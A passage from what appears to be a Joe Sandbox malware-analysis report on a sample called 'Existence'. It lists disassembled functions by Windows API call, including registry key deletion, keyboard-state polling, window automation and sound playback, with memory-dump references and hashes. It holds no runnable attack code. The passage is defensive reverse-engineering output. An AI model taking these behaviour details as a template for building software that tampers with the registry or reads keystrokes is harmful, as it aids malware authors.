                                                                                                                                                                                          • SetMenuItemInfoW.USER32(008029C0,00000004,00000000,00000030), ref: 0079C9A8
                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0079C9BA
                                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 0079CA00
                                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0079CA1D
                                                                                                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 0079CA49
                                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 0079CA90
                                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0079CAD6
                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0079CAEB
                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0079CB0C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                          • API String ID: 1460738036-4108050209
                                                                                                                                                                                          • Opcode ID: 69184b53cf6e1663fcd75516106d6e7babe7e4a1fe73fe2a51bf27371f22370a
                                                                                                                                                                                          • Instruction ID: db0eefa019801db53f13359df8faedd10b709c4dfc53352ec674c673ffa7ba6e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 69184b53cf6e1663fcd75516106d6e7babe7e4a1fe73fe2a51bf27371f22370a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9861A1B0900249AFDF22CF64ED89EFEBBB9FB05358F048059E911A3251D738AD11CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0079E4D4
                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0079E4FA
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079E504
                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0079E554
                                                                                                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0079E570
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                          • API String ID: 1939486746-1459072770
                                                                                                                                                                                          • Opcode ID: cc7b7aa60cecbc203d574b410933715b8ed018b9ae1b991cea8181c53eab93f3
                                                                                                                                                                                          • Instruction ID: 7c7f5fefc5e08f4dde07acd88e77f798e083dfc38d75af519978257485605033
                                                                                                                                                                                          • Opcode Fuzzy Hash: cc7b7aa60cecbc203d574b410933715b8ed018b9ae1b991cea8181c53eab93f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 02411572500218FAEB10AB649C4BEFF77ACDF55711F000029FE00A6182FFBD9A15D2A5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 007BD6C4
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 007BD6ED
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 007BD7A8
                                                                                                                                                                                            • Part of subcall function 007BD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 007BD70A
                                                                                                                                                                                            • Part of subcall function 007BD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 007BD71D
                                                                                                                                                                                            • Part of subcall function 007BD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007BD72F
                                                                                                                                                                                            • Part of subcall function 007BD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 007BD765
                                                                                                                                                                                            • Part of subcall function 007BD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 007BD788
                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 007BD753
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                          • API String ID: 2734957052-4033151799
                                                                                                                                                                                          • Opcode ID: a5d25771d109a4294105f4950b11ca436742ffb7d477eb45d8425f30b17df082
                                                                                                                                                                                          • Instruction ID: 080703dd155167be53c1c4bce1466d9d4ee073ea7568f869bfdecc6399df6814
                                                                                                                                                                                          • Opcode Fuzzy Hash: a5d25771d109a4294105f4950b11ca436742ffb7d477eb45d8425f30b17df082
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82318F75A01129BBDB309BA0DC88EFFBB7DEF45750F004069F905E2200EB389E459AA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • timeGetTime.WINMM ref: 0079EFCB
                                                                                                                                                                                            • Part of subcall function 0074F215: timeGetTime.WINMM(?,?,0079EFEB), ref: 0074F219
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0079EFF8
                                                                                                                                                                                          • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0079F01C
                                                                                                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0079F03E
                                                                                                                                                                                          • SetActiveWindow.USER32 ref: 0079F05D
                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0079F06B
                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0079F08A
                                                                                                                                                                                          • Sleep.KERNEL32(000000FA), ref: 0079F095
                                                                                                                                                                                          • IsWindow.USER32 ref: 0079F0A1
                                                                                                                                                                                          • EndDialog.USER32(00000000), ref: 0079F0B2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                          • String ID: BUTTON
                                                                                                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                                                                                                          • Opcode ID: 0a293fd2bdb9ababede3d2b22ae0d65d8856ef4cd6d88ae99a26f4e6c23e5d90
                                                                                                                                                                                          • Instruction ID: 8c268a69b0b0c16fd336f6039c4270e49c91024fab4b38df2c45ab39fad58a45
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a293fd2bdb9ababede3d2b22ae0d65d8856ef4cd6d88ae99a26f4e6c23e5d90
                                                                                                                                                                                          • Instruction Fuzzy Hash: 46216D72200204BFEB616F24FC8DF26BB6EFB59745B054039F605D2272CB7E8C519A65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0079F374
                                                                                                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0079F38A
                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0079F39B
                                                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0079F3AD
                                                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0079F3BE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: SendString$_wcslen
                                                                                                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                          • API String ID: 2420728520-1007645807
                                                                                                                                                                                          • Opcode ID: c71b23e16d618a8020130992d15dc282b5222b320f09c6ae93c1138524413559
                                                                                                                                                                                          • Instruction ID: 610951e53465013aa5606676f97b3ac8b322770961807472b1bdd302ddc351f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: c71b23e16d618a8020130992d15dc282b5222b320f09c6ae93c1138524413559
                                                                                                                                                                                          • Instruction Fuzzy Hash: 051191B1A5016DB9EB24A665DC4AEFF7B7CEB92B40F40042AB901E21D1DAA86904C5A0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 00763007
                                                                                                                                                                                            • Part of subcall function 00762D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4), ref: 00762D4E
                                                                                                                                                                                            • Part of subcall function 00762D38: GetLastError.KERNEL32(00801DC4,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4,00801DC4), ref: 00762D60
                                                                                                                                                                                          • _free.LIBCMT ref: 00763013
                                                                                                                                                                                          • _free.LIBCMT ref: 0076301E
                                                                                                                                                                                          • _free.LIBCMT ref: 00763029
                                                                                                                                                                                          • _free.LIBCMT ref: 00763034
                                                                                                                                                                                          • _free.LIBCMT ref: 0076303F
                                                                                                                                                                                          • _free.LIBCMT ref: 0076304A
                                                                                                                                                                                          • _free.LIBCMT ref: 00763055
                                                                                                                                                                                          • _free.LIBCMT ref: 00763060
                                                                                                                                                                                          • _free.LIBCMT ref: 0076306E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID: &}
                                                                                                                                                                                          • API String ID: 776569668-156965433
                                                                                                                                                                                          • Opcode ID: ee1e9450e57b2769c285d60ab0c83b8b06b7da621790d3c9fef40ebc76b99ac5
                                                                                                                                                                                          • Instruction ID: 9730fb134fd5f60d9ab76ce67a09caf541bc443706f16a74be8109cf00549153
                                                                                                                                                                                          • Opcode Fuzzy Hash: ee1e9450e57b2769c285d60ab0c83b8b06b7da621790d3c9fef40ebc76b99ac5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3211A776204508FFCB41EF94C846CDD3B65EF06390B8145A5FD09DB223D736DA529B50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0079A9D9
                                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0079AA44
                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 0079AA64
                                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 0079AA7B
                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 0079AAAA
                                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 0079AABB
                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 0079AAE7
                                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 0079AAF5
                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0079AB1E
                                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 0079AB2C
                                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 0079AB55
                                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 0079AB63
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                                          • Opcode ID: 51410032a73fef5e8cc741bc252dbd183d948860ad874c4669dfe1f1de5f37f2
                                                                                                                                                                                          • Instruction ID: 721d5e51fe24e3785c303c61e6ccee7f30da162890462d632cd09659a989ae40
                                                                                                                                                                                          • Opcode Fuzzy Hash: 51410032a73fef5e8cc741bc252dbd183d948860ad874c4669dfe1f1de5f37f2
                                                                                                                                                                                          • Instruction Fuzzy Hash: B5510860A057887AFF31D764A954BEABFB59F02340F08859DD5C21A1C2DA5CAB4CC7E3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00796649
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00796662
                                                                                                                                                                                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 007966C0
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 007966D0
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 007966E2
                                                                                                                                                                                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00796736
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00796744
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00796756
                                                                                                                                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00796798
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 007967AB
                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007967C1
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 007967CE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3096461208-0
                                                                                                                                                                                          • Opcode ID: 7b388a3ca8f32a7aa4268a2eb4add5c0d4784c0f7f16630fadc7f95a3e96f9e7
                                                                                                                                                                                          • Instruction ID: a6aa1653df9fe722c06a236e312955ad6162026c3937141d71a1eaf20cf1ed28
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b388a3ca8f32a7aa4268a2eb4add5c0d4784c0f7f16630fadc7f95a3e96f9e7
                                                                                                                                                                                          • Instruction Fuzzy Hash: F251FFB1A00215AFDF18CFA8DD95AAEBBB5FB48315F10822DF519E7290D774AD04CB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00731802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00731488,?,00000000,?,?,?,?,0073145A,00000000,?), ref: 00731865
                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00731521
                                                                                                                                                                                          • KillTimer.USER32(00000000,?,?,?,?,0073145A,00000000,?), ref: 007315BB
                                                                                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 007729B4
                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0073145A,00000000,?), ref: 007729E2
                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0073145A,00000000,?), ref: 007729F9
                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0073145A,00000000), ref: 00772A15
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00772A27
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 641708696-0
                                                                                                                                                                                          • Opcode ID: 27cf9717a3d4ed7935b502c04b06a418cebc16527be81fc7a860682237bbf174
                                                                                                                                                                                          • Instruction ID: 523eb9ab42e9da28afa20258b968b16c682cbc631340763297d78c9a572dcebf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 27cf9717a3d4ed7935b502c04b06a418cebc16527be81fc7a860682237bbf174
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11616831501711DFEB359F18D948F2ABBB1FB80322F90C129E44696672C7B8ACA1CF85
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00732234: GetWindowLongW.USER32(?,000000EB), ref: 00732242
                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00732152
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ColorLongWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 259745315-0
                                                                                                                                                                                          • Opcode ID: ae1d1beb06a688c4445bbf202116a781ffcf08944222706c17f92b4bf051e035
                                                                                                                                                                                          • Instruction ID: 890f3ff48b10abe0173ad28f1389690de11bf98c6d484873013aed8372fa5779
                                                                                                                                                                                          • Opcode Fuzzy Hash: ae1d1beb06a688c4445bbf202116a781ffcf08944222706c17f92b4bf051e035
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E41B431100648AFEB305F389C48FB93B65AB42770F158259FAA6872E3D7399D43EB11
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00780D31,00000001,0000138C,00000001,00000001,00000001,?,007AEEAE,00802430), ref: 0079A091
                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,00780D31,00000001), ref: 0079A09A
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00780D31,00000001,0000138C,00000001,00000001,00000001,?,007AEEAE,00802430,?), ref: 0079A0BC
                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,00780D31,00000001), ref: 0079A0BF
                                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0079A1E0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                          • API String ID: 747408836-2268648507
                                                                                                                                                                                          • Opcode ID: 9d00b80a5de131f0331c07f71a26fbc8344abc2e67e0dec10227d3de7ec3218e
                                                                                                                                                                                          • Instruction ID: 770e78a62f476783c64e0c12596a6b85b8445a772e69fb4f0e09ee6bac73e688
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d00b80a5de131f0331c07f71a26fbc8344abc2e67e0dec10227d3de7ec3218e
